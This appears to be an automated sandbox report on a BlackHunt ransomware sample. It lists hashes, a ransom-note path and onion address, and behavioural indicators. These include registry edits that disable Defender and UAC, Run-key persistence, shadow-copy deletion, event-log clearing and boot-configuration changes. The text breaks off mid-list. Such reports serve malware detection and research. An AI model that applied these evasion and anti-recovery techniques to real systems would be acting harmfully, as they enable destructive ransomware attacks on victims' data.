Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
111s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
17/01/2024, 20:11
Static task
static1
Behavioral task
behavioral1
Sample
23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe
Resource
win10v2004-20231215-en
General
-
Target
23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe
-
Size
707KB
-
MD5
6bef23cd23eeb7d37efb58ae7be872f4
-
SHA1
5104749cf54d1ced32d53e46809d2b79452f3870
-
SHA256
23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8
-
SHA512
a6f7324d6a2d69b89638e6f9ceb2ac331879e334589ebbd0bdac17dc06a0ed3ca42502b1f6a44c5c55ad66371ba891294b63eb496ef15a3670e93d53df017642
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1O86vnh:6uaTmkZJ+naie5OTamgEoKxLWFUh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5712 fsutil.exe 8912 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 7148 wevtutil.exe 632 wevtutil.exe 6812 wevtutil.exe 6356 wevtutil.exe 7152 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5704 bcdedit.exe 2236 bcdedit.exe 8932 bcdedit.exe 6244 bcdedit.exe -
Renames multiple (3363) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5692 wbadmin.exe 8888 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\P: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\A: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\Q: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\I: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\O: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\L: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\U: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\X: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\S: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\G: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\B: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\H: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\K: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\M: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Y: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\J: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\Z: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\W: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\R: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\V: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\N: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\F: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\hr-hr\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfxswt.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\ui-strings.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluNoInternetConnection_120x80.svg 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\ui-strings.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\plugin.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\plugin.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-sl\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Info.png 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\libs\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\VideoLAN\VLC\plugins\packetizer\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\jconsole.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\de-de\ui-strings.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_shared_single_filetype.svg 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\ui-strings.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\ui-strings.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ca-es\ui-strings.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\ui-strings.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_retina.png 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\ui-strings.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\PlayStore_icon.svg 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nl-nl\ui-strings.js 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\nashorn.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\WaitFormat.vbs 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3628 6312 WerFault.exe 292 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 416 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3420 vssadmin.exe 216 vssadmin.exe 8992 vssadmin.exe 2360 vssadmin.exe 4896 vssadmin.exe 3488 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4384 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6096 PING.EXE -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeRestorePrivilege 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeBackupPrivilege 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeTakeOwnershipPrivilege 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeAuditPrivilege 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeSecurityPrivilege 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeIncBasePriorityPrivilege 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeBackupPrivilege 316 vssvc.exe Token: SeRestorePrivilege 316 vssvc.exe Token: SeAuditPrivilege 316 vssvc.exe Token: SeBackupPrivilege 2776 wbengine.exe Token: SeRestorePrivilege 2776 wbengine.exe Token: SeSecurityPrivilege 2776 wbengine.exe Token: SeSecurityPrivilege 7148 wevtutil.exe Token: SeBackupPrivilege 7148 wevtutil.exe Token: SeSecurityPrivilege 632 wevtutil.exe Token: SeBackupPrivilege 632 wevtutil.exe Token: SeSecurityPrivilege 6356 wevtutil.exe Token: SeBackupPrivilege 6356 wevtutil.exe Token: SeSecurityPrivilege 6812 wevtutil.exe Token: SeBackupPrivilege 6812 